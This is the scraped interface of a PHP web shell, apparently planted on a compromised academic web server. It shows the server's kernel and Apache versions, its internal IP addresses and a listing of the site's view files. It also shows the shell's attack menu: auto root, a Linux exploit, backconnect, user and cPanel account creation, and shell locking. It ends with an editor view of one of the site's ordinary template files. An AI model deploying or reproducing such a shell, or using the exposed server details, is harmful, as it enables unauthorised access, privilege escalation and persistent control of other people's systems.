Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
front /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
02-05-23-publication.php
24.18
KB
-rwxr-x--x
11-05-publication-list.php
5.49
KB
-rwxr-x--x
11-05-publication.php
24.28
KB
-rwxr-x--x
17052023faculty.php
15.96
KB
-rwxr-x--x
170523events.php
13.09
KB
-rwxr-x--x
170523fareas.php
6.96
KB
-rwxr-x--x
170523media.php
7.04
KB
-rwxr-x--x
170523memories.php
9.73
KB
-rwxr-x--x
170523projects.php
14.15
KB
-rwxr-x--x
170523publication.php
4.13
KB
-rwxr-x--x
170523staff.php
15.96
KB
-rwxr-x--x
180624_jobs-content.php
590
B
-rw-r--r--
180624_jobs-list.php
5.95
KB
-rw-r--r--
180624_jobs.php
38.99
KB
-rw-r--r--
30-04-23-jobs.php
55.42
KB
-rwxr-x--x
30-04-23-last-final-contact.ph...
49.29
KB
-rwxr-x--x
con-email.php
12.48
KB
-rwxr-x--x
contact-last.php
20.72
KB
-rwxr-x--x
contact.php
22.35
KB
-rwxr-x--x
courses-content.php
541
B
-rwxr-x--x
courses-list.php
5.95
KB
-rwxr-x--x
courses.php
15.72
KB
-rwxr-x--x
events-content.php
177
B
-rwxr-x--x
events-list.php
8.33
KB
-rwxr-x--x
events.php
13.22
KB
-rwxr-x--x
faculty.php
16.07
KB
-rwxr-x--x
fareas-content.php
596
B
-rwxr-x--x
fareas-list.php
5.54
KB
-rwxr-x--x
fareas.php
6.69
KB
-rwxr-x--x
home.php
14.61
KB
-rwxr-x--x
jobs-content.php
590
B
-rwxr-x--x
jobs-list.php
5.97
KB
-rwxr-x--x
jobs.php
39.16
KB
-rwxr-x--x
media-content.php
613
B
-rwxr-x--x
media-list.php
8.35
KB
-rwxr-x--x
media.php
6.88
KB
-rwxr-x--x
memories.php
9.73
KB
-rwxr-x--x
projects-content.php
177
B
-rwxr-x--x
projects-list.php
8.39
KB
-rwxr-x--x
projects.php
14.48
KB
-rwxr-x--x
publication-content.php
16.73
KB
-rwxr-x--x
publication-list.php
5.63
KB
-rwxr-x--x
publication.php
4.26
KB
-rwxr-x--x
publication25042023.php
130.57
KB
-rwxr-x--x
staff.php
16.05
KB
-rwxr-x--x
workshops-content.php
616
B
-rwxr-x--x
workshops-list.php
8.4
KB
-rwxr-x--x
workshops.php
16.12
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 170523publication.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Infosys Centre for AI | Home</title> <link href="<?=$this->config->item('fimg_url');?>favicon.ico" rel="icon"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Lato:ital,wght@0,100;0,300;0,400;0,700;0,900;1,100;1,300;1,400;1,700;1,900&family=Merriweather:ital,wght@0,300;0,400;1,300;1,400&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha512-xh6O/CkQoPOWDdYTDqeRdPCVd1SpvCA9XXcUnZS2FmJNp1coAFzvtCN9BmamE+4aHK8yyUHUSCcJHgXloTyT2A==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <!-- Link Swiper's CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper/swiper-bundle.min.css" /> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>main.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>home.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>inner.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>mainv2.css"> <style> .app-header__logo { max-inline-size: 160px; } .app-header { height: 80px; } .app-header__search-area { height: 100px; } .app-header__logo, .app-header__logo img { filter: none !important; } @media screen and (max-width:600px) { .app-header__logo { max-inline-size: 160px; } } </style> </head> <body class="app"> <header class="app-header"><?php $this->load->view($DIR['TOP']);?></header> <?php $this->load->view($DIR['CONTENT']); ?> <footer class="c_site-footer"><?php $this->load->view($DIR['FOOTER']);?></footer> <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script> <script src="<?=$this->config->item('fjs_url');?>app.js"></script> <!-- Slider --> <!-- Swiper JS --> <script src="https://cdn.jsdelivr.net/npm/swiper/swiper-bundle.min.js"></script> <!-- Initialize Swiper --> <script> var swiper = new Swiper(".enevtSlider", { slidesPerView: 1, spaceBetween: 30, pagination: { el: ".swiper-pagination", clickable: true, }, breakpoints: { 640: { slidesPerView: 2 }, 768: { slidesPerView: 3 }, }, }); </script> <script> $(document).on("click","#subsId", function(){ $('#subMsgId').html(''); $('#subMsgId').hide(); var subsEmail=$('#subsEmail').val(); if(subsEmail!='') { if((validateEmail(subsEmail))==true) { var request = $.ajax({ url: "<?=site_url(_NSUB_);?>", type: "POST", data: {subsEmail:subsEmail}, dataType: "html" }); request.done(function(msg){ $('#subMsgId').show(); $('#subMsgId').html(msg); }); request.fail(function(jqXHR, textStatus) { alert( "Request failed: " + textStatus ); }); } else { $('#subMsgId').show(); $('#subMsgId').html('Invalid email address'); } } }); $(document).on("input","#subsEmail", function(){ if($(this).val()=='') { $('#subMsgId').html(''); $('#subMsgId').hide(); } }); function validateEmail($email) { var emailReg = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; return emailReg.test( $email ); } </script> </body> </html>
Close